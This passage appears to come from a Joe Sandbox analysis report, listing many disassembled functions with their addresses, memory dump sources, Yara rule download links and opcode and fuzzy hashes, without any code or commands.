                                                                                                                                                                                                                                                                          • Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
                                                                                                                                                                                                                                                                          Function 00B0B0AF Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                          • Instruction ID: 9de57634b5719e332d974c4554967143f247bae2de75ecf32f8d9a98af03e3af
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7041B2A01183D18ADB358F398060BBBBFE1EFA3219F1849EDC2D5A7682D7754407C759
                                                                                                                                                                                                                                                                          Function 0042AE48 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                          • Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
                                                                                                                                                                                                                                                                          Function 00AECB7E Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                          • Instruction ID: 22904379a7e01b250fb42853a486526a462d9613ce69a31c9b3e8dc8a48adbf7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B51457951C3808FD324CF25D840A6BB7F2EFC6314F18995CE88AAB2A5DB309906C746
                                                                                                                                                                                                                                                                          Function 0040C917 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                          • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                                                                                                                                                                                                                                          Function 00AF5F79 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                          • Instruction ID: 140c6e5f0cb1e5e37d513d1aa2cc8db36553446330a9b58120872a6b76fac7cf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 074168B1A007458BD7248F79CC917B277E2EF92304F288569F6D2CBBA1EA39D841C700
                                                                                                                                                                                                                                                                          Function 00B0B08B Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction ID: 0b7e3739174a86e16a50c6c09def73a72bbc323cd7e7b42fb1bfad7dbef391b5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A418EA01183D18ADB258B359060BBBBFD0EB93218F24599CC2D6A7682D7354407CB5A
                                                                                                                                                                                                                                                                          Function 0042AE24 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                                                                                                                                                                          Function 00B1B2C2 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                          • Instruction ID: 75d3905c4b6c91d683226b9ef92aa205fb85247b25b64a821013400a5f507110
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB419B76A587148FC324EF54ECC09BEB3E1EF86320FAE856CD5E517351E7609C508249
                                                                                                                                                                                                                                                                          Function 00B1B2C4 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction ID: bc552f82395c64de4cf9b90ca02ea0ba2278c60b9606e9f3872353e1967e0e13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F317776A587548FC328EFA4F8C09BAB3E1EB8B310F6E856C85E60B351D7709D508649
                                                                                                                                                                                                                                                                          Function 0043B05D Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                                                                                                                                                                          Function 00B060F7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                          • Instruction ID: df50e1928215f05d951ef23409539016739419ef2ffd7576fdf902998951f297
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4417EB26183908BD734CF24C85179FBBF2EBD1214F498E6C94DAAB345E73589058B87
                                                                                                                                                                                                                                                                          Function 00B0B05B Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction ID: 826407ac5e0dd1f0df7841274472d750163b08efd00425c0fc645b1067ed1824
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68317FA01183D18ADB358F259060BFBBFE0AF93219F1489EDC2D6A7693D7344447CB5A
                                                                                                                                                                                                                                                                          Function 00B0C6C3 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                          • Instruction ID: 1353773af2514649b590c7878efbcb71fd2a41214169596f3e9d3389f7dfdb4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 003109741193C14BD7B94B285860BBABFD2DF93304F285AACD0CA4B1D2DB254C45CB56
                                                                                                                                                                                                                                                                          Function 0042C45C Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                          • Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                          • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                                                          Function 0042ADF4 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                                                          Function 00B089C0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                          • Instruction ID: 5bea288419d25e331693870aff254cdfdc827aef98e3469463e06181867feca1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A3174323183048FC324CF648C8067ABB92EB92744F1C85BED9C543B82DB75CE018742
                                                                                                                                                                                                                                                                          Function 00AEDA09 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                          • Instruction ID: 01f68c826634c531da2c8faab51d4b7c063a96f94b6c316bb8a5b318c5399318
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D31F7346185419BE725AB1A8C40B3677B3FBC6340F68D63CE0C2832A4DE30AC518754
                                                                                                                                                                                                                                                                          Function 0040D7A2 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                          • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                                                          Function 00B1BC08 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction ID: c15074340de53376e7a72fe60479440301fcc6f103e40041163cb2b45f185aad
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C213921B087910BD718DE3988D166BFBD3DBDB224F48C67EC4A28B6D5DA30D9058688
                                                                                                                                                                                                                                                                          Function 0043B9A1 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                                                          Function 00AF6544 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                          • Instruction ID: 1541a82c6766fbf3c251795dd2036387ccc6d3a3b4bb33a3d2bd31292a9fa64d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C021F334614B019FD364CF28C880B37B7E3EBD6720F248668E5959B699DB30EC42DB44
                                                                                                                                                                                                                                                                          Function 0043BF40 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
